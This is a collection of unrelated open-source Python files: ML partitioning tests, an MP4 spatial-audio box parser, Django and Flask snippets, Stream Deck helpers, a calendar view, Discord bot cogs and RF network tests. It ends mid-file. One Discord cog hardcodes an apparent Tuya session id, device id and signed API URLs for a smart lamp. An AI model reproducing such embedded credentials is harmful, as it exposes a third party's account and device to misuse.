'dense': {
'bias_axes': AxisMetadata(names=('embed',)),
'kernel_axes': AxisMetadata(names=('vocab', 'embed')),
}
},
})
train_state = InferenceState.create(model_variables)
logical_axes = partitioner.get_logical_axes(train_state)
# No expert axis overrides to InferenceState. Partition specs should match
# input axis metadata.
self.assertEqual(
logical_axes,
InferenceState(
step=None,
params=flax_core.FrozenDict({
'dense': {
'bias': PartitionSpec('embed',),
'kernel': PartitionSpec('vocab', 'embed'),
},
})))
@mock.patch('jax.device_count')
def test_overridden_logical_axis_rules(self, device_count: int):
device_count.return_value = 4
# Fewer experts than devices --> modified axis rules with two 'batch' axes.
self.assertEqual(
moe_partitioning.standard_logical_axis_rules(
num_experts=1,
num_partitions=1,
model_parallel_submesh=None,
additional_rules=[('additional', 'model'),
('expert_magic', 'data')]),
[
('batch', ('data', 'model')), # Shard batch over entire mesh
# No sharding of weights over model axis.
('vocab', None),
('embed', None),
('mlp', None),
('heads', None),
('kv', None),
('joined_kv', None),
('relpos_buckets', None),
('abspos_buckets', None),
('length', None),
('layers', None),
('stack', None),
('mlp_activations', None),
('expert', 'data'), # Shard experts over "first" data axis only
('expert_mlp', None),
('expert_group', None),
# Experts replicated along "second" data axis
('expert_replicas', 'model'),
('unmodeled', None),
('additional', None),
('expert_magic', 'data'),
])
def test_default_logical_axis(self):
# Model parallelism used --> default logical axis rules.
self.assertEqual(
moe_partitioning.standard_logical_axis_rules(
num_experts=1,
num_partitions=2,
model_parallel_submesh=None,
additional_rules=[('additional', 'model')]),
[
('batch', 'data'), # Shard batch over single data axis
# Default model annotations used.
('vocab', 'model'),
('embed', None),
('mlp', 'model'),
('heads', 'model'),
('kv', None),
('joined_kv', 'model'),
('relpos_buckets', None),
('abspos_buckets', None),
('length', None),
('layers', None),
('stack', None),
('mlp_activations', None),
('expert', 'data'), # Shard experts along data axis
('expert_mlp', 'model'),
('expert_group', None),
('expert_replicas', None),
('unmodeled', None),
('additional', 'model'),
])
def test_data_partition_spec(self):
self.assertEqual(
moe_partitioning.data_partition_spec(two_data_axes=False),
PartitionSpec('data',))
self.assertEqual(
moe_partitioning.data_partition_spec(two_data_axes=True),
PartitionSpec(('data', 'model'),))
@mock.patch('jax.device_count')
def test_when_to_override_model_axis(self, device_count: int):
device_count.return_value = 4
# More experts than devices.
self.assertFalse(
moe_partitioning._override_model_axis(
num_experts=8, num_partitions=1, model_parallel_submesh=None))
# Fewer experts than devices.
self.assertTrue(
moe_partitioning._override_model_axis(
num_experts=1, num_partitions=1, model_parallel_submesh=None))
# Model parallelism used.
self.assertFalse(
moe_partitioning._override_model_axis(
num_experts=1, num_partitions=2, model_parallel_submesh=None))
def test_axis_resource_overrides(self):
input_resources = (PartitionSpec('data'), PartitionSpec('model'), None,
PartitionSpec('unrecognized'))
overridden_resources = moe_partitioning._override_partition_specs(
input_resources)
# "data" -> ("data", "model"). "model" -> None.
self.assertEqual(overridden_resources, (PartitionSpec(
('data', 'model'),), None, None, PartitionSpec('unrecognized',)))
if __name__ == '__main__':
absltest.main()
|
mpeg/sa3d.py | frade/spatialmedia | 1,469 | 12745199 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MPEG SA3D box processing classes.
Enables the injection of an SA3D MPEG-4. The SA3D box specification
conforms to that outlined in docs/spatial-audio-rfc.md
"""
import struct
from spatialmedia.mpeg import box
from spatialmedia.mpeg import constants
def load(fh, position=None, end=None):
""" Loads the SA3D box located at position in an mp4 file.
Args:
fh: file handle, input file handle.
position: int or None, current file position.
Returns:
new_box: box, SA3D box loaded from the file location or None.
"""
if position is None:
position = fh.tell()
fh.seek(position)
new_box = SA3DBox()
new_box.position = position
size = struct.unpack(">I", fh.read(4))[0]
name = fh.read(4)
if (name != constants.TAG_SA3D):
print("Error: box is not an SA3D box.")
return None
if (position + size > end):
print("Error: SA3D box size exceeds bounds.")
return None
new_box.content_size = size - new_box.header_size
new_box.version = struct.unpack(">B", fh.read(1))[0]
new_box.ambisonic_type = struct.unpack(">B", fh.read(1))[0]
new_box.head_locked_stereo = (new_box.ambisonic_type & int('10000000', 2) != 0)
new_box.ambisonic_type = new_box.ambisonic_type & int('01111111', 2)
new_box.ambisonic_order = struct.unpack(">I", fh.read(4))[0]
new_box.ambisonic_channel_ordering = struct.unpack(">B", fh.read(1))[0]
new_box.ambisonic_normalization = struct.unpack(">B", fh.read(1))[0]
new_box.num_channels = struct.unpack(">I", fh.read(4))[0]
for i in range(0, new_box.num_channels):
new_box.channel_map.append(
struct.unpack(">I", fh.read(4))[0])
return new_box
class SA3DBox(box.Box):
ambisonic_types = {'periphonic': 0}
ambisonic_orderings = {'ACN': 0}
ambisonic_normalizations = {'SN3D': 0}
def __init__(self):
box.Box.__init__(self)
self.name = constants.TAG_SA3D
self.header_size = 8
self.version = 0
self.ambisonic_type = 0
self.head_locked_stereo = False
self.ambisonic_order = 0
self.ambisonic_channel_ordering = 0
self.ambisonic_normalization = 0
self.num_channels = 0
self.channel_map = list()
@staticmethod
def create(num_channels, audio_metadata):
new_box = SA3DBox()
new_box.header_size = 8
new_box.name = constants.TAG_SA3D
new_box.version = 0 # uint8
new_box.content_size += 1 # uint8
new_box.ambisonic_type = SA3DBox.ambisonic_types[
audio_metadata["ambisonic_type"]]
new_box.head_locked_stereo = audio_metadata["head_locked_stereo"]
new_box.content_size += 1 # uint8
new_box.ambisonic_order = audio_metadata["ambisonic_order"]
new_box.content_size += 4 # uint32
new_box.ambisonic_channel_ordering = SA3DBox.ambisonic_orderings[
audio_metadata["ambisonic_channel_ordering"]]
new_box.content_size += 1 # uint8
new_box.ambisonic_normalization = SA3DBox.ambisonic_normalizations[
audio_metadata["ambisonic_normalization"]]
new_box.content_size += 1 # uint8
new_box.num_channels = num_channels
new_box.content_size += 4 # uint32
channel_map = audio_metadata["channel_map"]
for channel_element in channel_map:
new_box.channel_map.append(channel_element)
new_box.content_size += 4 # uint32
return new_box
def ambisonic_type_name(self):
return next((key for key,value in SA3DBox.ambisonic_types.items()
if value==self.ambisonic_type))
def ambisonic_channel_ordering_name(self):
return next((key for key,value in SA3DBox.ambisonic_orderings.items()
if value==self.ambisonic_channel_ordering))
def ambisonic_normalization_name(self):
return next((key for key,value in SA3DBox.ambisonic_normalizations.items()
if value==self.ambisonic_normalization))
def print_box(self, console):
""" Prints the contents of this spatial audio (SA3D) box to the
console.
"""
ambisonic_type = self.ambisonic_type_name()
channel_ordering = self.ambisonic_channel_ordering_name()
ambisonic_normalization = self.ambisonic_normalization_name()
console("\t\tAmbisonic Type: %s" % ambisonic_type)
console("\t\tContains Head-Locked Stereo: %r" % self.head_locked_stereo)
console("\t\tAmbisonic Order: %d" % self.ambisonic_order)
console("\t\tAmbisonic Channel Ordering: %s" % channel_ordering)
console("\t\tAmbisonic Normalization: %s" % ambisonic_normalization)
console("\t\tNumber of Channels: %d" % self.num_channels)
console("\t\tChannel Map: %s" % str(self.channel_map))
def get_metadata_string(self):
""" Outputs a concise single line audio metadata string. """
metadata = "%s, %s, %s, Order %d, %d Channel(s), Channel Map: %s" \
% (self.ambisonic_normalization_name(),\
self.ambisonic_channel_ordering_name(),\
self.ambisonic_type_name(),\
self.ambisonic_order,\
self.num_channels,\
str(self.channel_map))
return metadata
def save(self, in_fh, out_fh, delta):
if (self.header_size == 16):
out_fh.write(struct.pack(">I", 1))
out_fh.write(struct.pack(">Q", self.size()))
out_fh.write(self.name)
elif(self.header_size == 8):
out_fh.write(struct.pack(">I", self.size()))
out_fh.write(self.name)
ambisonic_type = (
self.ambisonic_type | int('10000000', 2) if
self.head_locked_stereo else self.ambisonic_type & int('01111111', 2))
out_fh.write(struct.pack(">B", self.version))
out_fh.write(struct.pack(">B", ambisonic_type))
out_fh.write(struct.pack(">I", self.ambisonic_order))
out_fh.write(struct.pack(">B", self.ambisonic_channel_ordering))
out_fh.write(struct.pack(">B", self.ambisonic_normalization))
out_fh.write(struct.pack(">I", self.num_channels))
for i in self.channel_map:
if (i != None):
out_fh.write(struct.pack(">I", int(i)))
|
symposion/reviews/management/commands/promoteproposals.py | azkarmoulana/pycon | 154 | 12745200 | from django.core.management.base import BaseCommand
from django.db import connections
from symposion.reviews.models import ProposalResult, promote_proposal
class Command(BaseCommand):
def handle(self, *args, **options):
accepted_proposals = ProposalResult.objects.filter(status="accepted")
accepted_proposals = accepted_proposals.order_by("proposal")
for result in accepted_proposals:
promote_proposal(result.proposal)
connections["default"].cursor().execute("SELECT setval('schedule_session_id_seq', (SELECT max(id) FROM schedule_session))")
|
envelopes/connstack.py | siyaoyao/envelopes | 202 | 12745239 | # -*- coding: utf-8 -*-
# Copyright 2012 <NAME>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY VINCENT DRIESSEN ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL VINCENT DRIESSEN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Vincent Driessen.
#
"""
envelopes.connstack
===================
This module implements SMTP connection stack management.
"""
from contextlib import contextmanager
from .local import LocalStack, release_local
class NoSMTPConnectionException(Exception):
pass
@contextmanager
def Connection(connection):
push_connection(connection)
try:
yield
finally:
popped = pop_connection()
assert popped == connection, \
'Unexpected SMTP connection was popped off the stack. ' \
'Check your SMTP connection setup.'
def push_connection(connection):
"""Pushes the given connection on the stack."""
_connection_stack.push(connection)
def pop_connection():
"""Pops the topmost connection from the stack."""
return _connection_stack.pop()
def use_connection(connection):
"""Clears the stack and uses the given connection. Protects against mixed
use of use_connection() and stacked connection contexts.
"""
assert len(_connection_stack) <= 1, \
'You should not mix Connection contexts with use_connection().'
release_local(_connection_stack)
push_connection(connection)
def get_current_connection():
"""Returns the current SMTP connection (i.e. the topmost on the
connection stack).
"""
return _connection_stack.top
def resolve_connection(connection=None):
"""Convenience function to resolve the given or the current connection.
Raises an exception if it cannot resolve a connection now.
"""
if connection is not None:
return connection
connection = get_current_connection()
if connection is None:
raise NoSMTPConnectionException(
'Could not resolve an SMTP connection.')
return connection
_connection_stack = LocalStack()
__all__ = [
'Connection', 'get_current_connection', 'push_connection',
'pop_connection', 'use_connection'
]
|
Interview Preparation Kit - Python/01. Warm-up Challenges/004. Repeated String.py | Snehakri022/HackerrankPractice | 831 | 12745270 | # Problem: https://www.hackerrank.com/challenges/repeated-string/problem
# Score: 20
def repeated_string(s, n):
return n // len(s) * s.count('a') + s[0: n % len(s)].count('a')
s = input()
n = int(input())
print(repeated_string(s, n))
|
src/StreamDeck/ImageHelpers/PILHelper.py | rolandio/python-elgato-streamdeck | 517 | 12745329 | <reponame>rolandio/python-elgato-streamdeck
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import io
def create_image(deck, background='black'):
"""
Creates a new PIL Image with the correct image dimensions for the given
StreamDeck device's keys.
.. seealso:: See :func:`~PILHelper.to_native_format` method for converting a
PIL image instance to the native image format of a given
StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible image for.
:param str background: Background color to use, compatible with `PIL.Image.new()`.
:rtype: PIL.Image
:return: Created PIL image
"""
from PIL import Image
image_format = deck.key_image_format()
return Image.new("RGB", image_format['size'], background)
def create_scaled_image(deck, image, margins=[0, 0, 0, 0], background='black'):
"""
Creates a new key image that contains a scaled version of a given image,
resized to best fit the given StreamDeck device's keys with the given
margins around each side.
The scaled image is centered within the new key image, offset by the given
margins. The aspect ratio of the image is preserved.
.. seealso:: See :func:`~PILHelper.to_native_format` method for converting a
PIL image instance to the native image format of a given
StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible image for.
:param Image image: PIL Image object to scale
:param list(int): Array of margin pixels in (top, right, bottom, left) order.
:param str background: Background color to use, compatible with `PIL.Image.new()`.
:rtrype: PIL.Image
:return: Loaded PIL image scaled and centered
"""
from PIL import Image
if len(margins) != 4:
raise ValueError("Margins should be given as an array of four integers.")
final_image = create_image(deck, background=background)
thumbnail_max_width = final_image.width - (margins[1] + margins[3])
thumbnail_max_height = final_image.height - (margins[0] + margins[2])
thumbnail = image.convert("RGBA")
thumbnail.thumbnail((thumbnail_max_width, thumbnail_max_height), Image.LANCZOS)
thumbnail_x = (margins[3] + (thumbnail_max_width - thumbnail.width) // 2)
thumbnail_y = (margins[0] + (thumbnail_max_height - thumbnail.height) // 2)
final_image.paste(thumbnail, (thumbnail_x, thumbnail_y), thumbnail)
return final_image
def to_native_format(deck, image):
"""
Converts a given PIL image to the native image format for a StreamDeck,
suitable for passing to :func:`~StreamDeck.set_key_image`.
.. seealso:: See :func:`~PILHelper.create_image` method for creating a PIL
image instance for a given StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible native image for.
:param PIL.Image image: PIL Image to convert to the native StreamDeck image format
:rtype: enumerable()
:return: Image converted to the given StreamDeck's native format
"""
from PIL import Image
image_format = deck.key_image_format()
if image_format['rotation']:
image = image.rotate(image_format['rotation'])
if image_format['flip'][0]:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
if image_format['flip'][1]:
image = image.transpose(Image.FLIP_TOP_BOTTOM)
if image.size != image_format['size']:
image.thumbnail(image_format['size'])
# We want a compressed image in a given codec, convert.
compressed_image = io.BytesIO()
image.save(compressed_image, image_format['format'], quality=100)
return compressed_image.getbuffer()
|
docs/conf.py | modwizcode/luna | 609 | 12745332 |
# -- Project information -----------------------------------------------------
project = 'LUNA'
copyright = '2020 Great Scott Gadgets'
author = '<NAME>'
# -- General configuration ---------------------------------------------------
master_doc = 'index'
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
html_css_files = ['status.css']
# -- Options for automatic documentation -------------------------------------
# Skip documenting Tests.
def autodoc_skip_member_handler(app, what, name, obj, skip, options):
return \
name.endswith("Test") or \
name.startswith('_') or \
(name == "elaborate")
def setup(app):
app.connect('autodoc-skip-member', autodoc_skip_member_handler)
|
extra_views/dates.py | CleitonDeLima/django-extra-views | 974 | 12745359 | <filename>extra_views/dates.py
import datetime
import math
from calendar import Calendar
from collections import defaultdict
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Q
from django.utils.translation import gettext_lazy as _
from django.views.generic.dates import (
DateMixin,
MonthMixin,
YearMixin,
_date_from_string,
)
from django.views.generic.list import BaseListView, MultipleObjectTemplateResponseMixin
DAYS = (
_("Monday"),
_("Tuesday"),
_("Wednesday"),
_("Thursday"),
_("Friday"),
_("Saturday"),
_("Sunday"),
)
def daterange(start_date, end_date):
"""
Returns an iterator of dates between two provided ones
"""
for n in range(int((end_date - start_date).days + 1)):
yield start_date + datetime.timedelta(n)
class BaseCalendarMonthView(DateMixin, YearMixin, MonthMixin, BaseListView):
"""
A base view for displaying a calendar month
"""
first_of_week = 0 # 0 = Monday, 6 = Sunday
paginate_by = None # We don't want to use this part of MultipleObjectMixin
date_field = None
end_date_field = None # For supporting events with duration
def get_paginate_by(self, queryset):
if self.paginate_by is not None:
raise ImproperlyConfigured(
"'%s' cannot be paginated, it is a calendar view"
% self.__class__.__name__
)
return None
def get_allow_future(self):
return True
def get_end_date_field(self):
"""
Returns the model field to use for end dates
"""
return self.end_date_field
def get_start_date(self, obj):
"""
Returns the start date for a model instance
"""
obj_date = getattr(obj, self.get_date_field())
try:
obj_date = obj_date.date()
except AttributeError:
# It's a date rather than datetime, so we use it as is
pass
return obj_date
def get_end_date(self, obj):
"""
Returns the end date for a model instance
"""
obj_date = getattr(obj, self.get_end_date_field())
try:
obj_date = obj_date.date()
except AttributeError:
# It's a date rather than datetime, so we use it as is
pass
return obj_date
def get_first_of_week(self):
"""
Returns an integer representing the first day of the week.
0 represents Monday, 6 represents Sunday.
"""
if self.first_of_week is None:
raise ImproperlyConfigured(
"%s.first_of_week is required." % self.__class__.__name__
)
if self.first_of_week not in range(7):
raise ImproperlyConfigured(
"%s.first_of_week must be an integer between 0 and 6."
% self.__class__.__name__
)
return self.first_of_week
def get_queryset(self):
"""
Returns a queryset of models for the month requested
"""
qs = super().get_queryset()
year = self.get_year()
month = self.get_month()
date_field = self.get_date_field()
end_date_field = self.get_end_date_field()
date = _date_from_string(
year, self.get_year_format(), month, self.get_month_format()
)
since = date
until = self.get_next_month(date)
# Adjust our start and end dates to allow for next and previous
# month edges
if since.weekday() != self.get_first_of_week():
diff = math.fabs(since.weekday() - self.get_first_of_week())
since = since - datetime.timedelta(days=diff)
if until.weekday() != ((self.get_first_of_week() + 6) % 7):
diff = math.fabs(((self.get_first_of_week() + 6) % 7) - until.weekday())
until = until + datetime.timedelta(days=diff)
if end_date_field:
# 5 possible conditions for showing an event:
# 1) Single day event, starts after 'since'
# 2) Multi-day event, starts after 'since' and ends before 'until'
# 3) Starts before 'since' and ends after 'since' and before 'until'
# 4) Starts after 'since' but before 'until' and ends after 'until'
# 5) Starts before 'since' and ends after 'until'
predicate1 = Q(**{"%s__gte" % date_field: since, end_date_field: None})
predicate2 = Q(
**{"%s__gte" % date_field: since, "%s__lt" % end_date_field: until}
)
predicate3 = Q(
**{
"%s__lt" % date_field: since,
"%s__gte" % end_date_field: since,
"%s__lt" % end_date_field: until,
}
)
predicate4 = Q(
**{
"%s__gte" % date_field: since,
"%s__lt" % date_field: until,
"%s__gte" % end_date_field: until,
}
)
predicate5 = Q(
**{"%s__lt" % date_field: since, "%s__gte" % end_date_field: until}
)
return qs.filter(
predicate1 | predicate2 | predicate3 | predicate4 | predicate5
)
return qs.filter(**{"%s__gte" % date_field: since})
def get_context_data(self, **kwargs):
"""
Injects variables necessary for rendering the calendar into the context.
Variables added are: `calendar`, `weekdays`, `month`, `next_month` and
`previous_month`.
"""
data = super().get_context_data(**kwargs)
year = self.get_year()
month = self.get_month()
date = _date_from_string(
year, self.get_year_format(), month, self.get_month_format()
)
cal = Calendar(self.get_first_of_week())
month_calendar = []
now = datetime.datetime.utcnow()
date_lists = defaultdict(list)
multidate_objs = []
for obj in data["object_list"]:
obj_date = self.get_start_date(obj)
end_date_field = self.get_end_date_field()
if end_date_field:
end_date = self.get_end_date(obj)
if end_date and end_date != obj_date:
multidate_objs.append(
{
"obj": obj,
"range": [x for x in daterange(obj_date, end_date)],
}
)
continue # We don't put multi-day events in date_lists
date_lists[obj_date].append(obj)
for week in cal.monthdatescalendar(date.year, date.month):
week_range = set(daterange(week[0], week[6]))
week_events = []
for val in multidate_objs:
intersect_length = len(week_range.intersection(val["range"]))
if intersect_length:
# Event happens during this week
slot = 1
width = (
intersect_length # How many days is the event during this week?
)
nowrap_previous = (
True # Does the event continue from the previous week?
)
nowrap_next = True # Does the event continue to the next week?
if val["range"][0] >= week[0]:
slot = 1 + (val["range"][0] - week[0]).days
else:
nowrap_previous = False
if val["range"][-1] > week[6]:
nowrap_next = False
week_events.append(
{
"event": val["obj"],
"slot": slot,
"width": width,
"nowrap_previous": nowrap_previous,
"nowrap_next": nowrap_next,
}
)
week_calendar = {"events": week_events, "date_list": []}
for day in week:
week_calendar["date_list"].append(
{
"day": day,
"events": date_lists[day],
"today": day == now.date(),
"is_current_month": day.month == date.month,
}
)
month_calendar.append(week_calendar)
data["calendar"] = month_calendar
data["weekdays"] = [DAYS[x] for x in cal.iterweekdays()]
data["month"] = date
data["next_month"] = self.get_next_month(date)
data["previous_month"] = self.get_previous_month(date)
return data
class CalendarMonthView(MultipleObjectTemplateResponseMixin, BaseCalendarMonthView):
"""
A view for displaying a calendar month, and rendering a template response
"""
template_name_suffix = "_calendar_month"
|
app/__init__.py | johnwheeler/flask-live-starter | 119 | 12745372 | <reponame>johnwheeler/flask-live-starter<gh_stars>100-1000
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_pyfile('settings.cfg')
db = SQLAlchemy(app)
if not app.debug:
import logging
fmt = "%(levelname)s - %(asctime)s %(filename)s:%(lineno)d %(message)s"
formatter = logging.Formatter(fmt=fmt)
log_path = '/var/log/flask/{}.log'.format(__name__)
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
|
test/plugins/echo.py | fenwar/limbo | 369 | 12745396 | def on_message_deleted(msg, server):
return "Deleted: {}".format(msg["previous_message"]["text"])
def on_message_changed(msg, server):
text = msg.get("message", {"text": ""}).get("text", "")
if text.startswith("!echo"):
return "Changed: {}".format(text)
def on_message(msg, server):
if msg["text"].startswith("!echo"):
return msg.get("text", "")
def on_channel_join(msg, server):
return "saw user {} join".format(msg['user'])
|
imagepy/tools/Measure/coordinate_tol.py | dada1437903138/imagepy | 1,178 | 12745425 | from sciapp.action import CoordinateTool as Plugin |
ppgan/faceutils/image.py | pcwuyu/PaddleGAN | 6,852 | 12745431 | <reponame>pcwuyu/PaddleGAN
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import cv2
from io import BytesIO
def resize_by_max(image, max_side=512, force=False):
h, w = image.shape[:2]
if max(h, w) < max_side and not force:
return image
ratio = max(h, w) / max_side
w = int(w / ratio + 0.5)
h = int(h / ratio + 0.5)
return cv2.resize(image, (w, h))
|
examples/apidemos-preference-advanced_preferences.py | tqchagas/AndroidViewClient | 1,155 | 12745436 | <filename>examples/apidemos-preference-advanced_preferences.py
#! /usr/bin/env python
'''
Copyright (C) 2012 <NAME>
Created on Sep 18, 2012
@author: diego
'''
import re
import sys
import os
try:
sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except:
pass
import com.dtmilano.android.viewclient as viewclient
if viewclient.__version__ < '1.0':
print >> sys.stderr, "%s: This script requires viewclient 1.0 or greater." % os.path.basename(sys.argv[0])
sys.exit(1)
device, serialno = viewclient.ViewClient.connectToDeviceOrExit()
FLAG_ACTIVITY_NEW_TASK = 0x10000000
#09-06 01:01:34.964: I/ActivityManager(873): START {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10200000 cmp=com.example.android.apis/.ApiDemos bnds=[784,346][880,442]} from pid 991
componentName = 'com.example.android.apis/.ApiDemos'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
viewclient.ViewClient.sleep(3)
vc = viewclient.ViewClient(device=device, serialno=serialno)
vc.findViewWithTextOrRaise('Preference').touch()
vc.dump()
vc.findViewWithTextOrRaise(re.compile('.*Advanced preferences')).touch()
vc.dump()
myPreference = vc.findViewWithTextOrRaise('My preference')
if vc.getSdkVersion() >= 16:
_id = 'id/no_id/22'
else:
_id = 'id/mypreference_widget'
value0 = vc.findViewByIdOrRaise(_id).getText()
for i in range(10):
myPreference.touch()
vc.dump()
value1 = vc.findViewByIdOrRaise(_id).getText()
print "My preference started with value %s and is now %s" % (value0, value1)
|
python/cogs/extra/lamp.py | dev-null-undefined/felix | 135 | 12745461 | """This is a cog for a discord.py bot.
It adds Lamp
"""
from discord.ext import commands
class Lamp(commands.Cog, command_attrs=dict(hidden=True)):
def __init__(self, client):
self.client = client
@commands.group(
name='lamp',
hidden=True,
invoke_without_command=True,
)
async def lamp(self, ctx):
"""Commands to control the live stream integration"""
await ctx.send_help('lamp')
@lamp.command(
name='off',
)
async def lamp_off(self, ctx):
url = 'https://a1.tuyaus.com/api.json?appVersion=3.13.0&appRnVersion=5.18&channel=oem&sign=47e07d9cf53bbab369fc504760c8d3752f0f7c2f8a56fe8c63f28c99d7bb8e1c&platform=ONEPLUS%20A5000&requestId=7c696d1e-8579-4871-b271-71b6a3a093d5&lang=en&a=tuya.m.device.dp.publish&clientId=ekmnwp9f5pnh3trdtpgy&osSystem=9&os=Android&timeZoneId=America%2FChicago&ttid=sdk_tuya%40ekmnwp9f5pnh3trdtpgy&et=0.0.1&v=1.0&sdkVersion=3.13.0&time=1572717891'
headers = {
'User-Agent':'TY-UA=APP/Android/3.13.0/SDK/3.13.0',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'260',
'Host':'a1.tuyaus.com',
'Connection':'Keep-Alive',
'Accept-Encoding':'gzip',
}
data = {
'postData':'{"devId":"06200623b4e62d1a196d","dps":"{\\"1\\":false}","gwId":"06200623b4e62d1a196d"}',
'deviceId':'0cbe6a9f082da9d8ad9607677542561f46adb4592222',
'sid':'az152789n0645407g6y4cy235e9cec2811a8b93caefedeea3c2ce5a8',
}
async with self.client.session.post(url, headers=headers, data=data) as response:
res = await response.json()
print(res)
if res['status'] == 'ok':
await ctx.send('Success')
@lamp.command(
name='on',
)
async def lamp_on(self, ctx):
print('on')
url = 'https://a1.tuyaus.com/api.json?appVersion=3.13.0&appRnVersion=5.18&channel=oem&sign=a8a0a9914c77dc5d01f2826a2588bb25151a1d9b46688223b10586a3fc56a4c7&platform=ONEPLUS%20A5000&requestId=3a891769-255a-4a55-971a-551df700252f&lang=en&a=tuya.m.device.dp.publish&clientId=ekmnwp9f5pnh3trdtpgy&osSystem=9&os=Android&timeZoneId=America%2FChicago&ttid=sdk_tuya%40ekmnwp9f5pnh3trdtpgy&et=0.0.1&v=1.0&sdkVersion=3.13.0&time=1572717894'
headers = {
'User-Agent':'TY-UA=APP/Android/3.13.0/SDK/3.13.0',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'259',
'Host':'a1.tuyaus.com',
'Connection':'Keep-Alive',
'Accept-Encoding':'gzip',
}
data = {
'postData':'{"devId":"06200623b4e62d1a196d","dps":"{\\"1\\":true}","gwId":"06200623b4e62d1a196d"}',
'deviceId':'0cbe6a9f082da9d8ad9607677542561f46adb4592222',
'sid':'az152789n0645407g6y4cy235e9cec2811a8b93caefedeea3c2ce5a8',
}
print('sending')
async with self.client.session.post(url, headers=headers, data=data) as response:
res = await response.json()
print(res)
if res['status'] == 'ok':
await ctx.send('Success')
def setup(client):
"""This is called when the cog is loaded via load_extension"""
client.add_cog(Lamp(client))
|
skrf/media/tests/test_media.py | dxxx9/scikit-rf | 379 | 12745482 | <reponame>dxxx9/scikit-rf
# -*- coding: utf-8 -*-
import unittest
import os
import numpy as npy
from skrf.media import DefinedGammaZ0, Media
from skrf.network import Network
from skrf.frequency import Frequency
import skrf
class DefinedGammaZ0TestCase(unittest.TestCase):
def setUp(self):
self.files_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'qucs_prj'
)
self.dummy_media = DefinedGammaZ0(
frequency = Frequency(1,100,21,'ghz'),
gamma=1j,
z0 = 50 ,
)
def test_impedance_mismatch(self):
"""
"""
fname = os.path.join(self.files_dir,\
'impedanceMismatch,50to25.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.thru(z0=50)**\
self.dummy_media.thru(z0=25)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_resistor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'resistor,1ohm.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.resistor(1)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_capacitor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'capacitor,p01pF.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.capacitor(.01e-12)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_inductor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'inductor,p1nH.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.inductor(.1e-9)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_scalar_gamma_z0_media(self):
"""
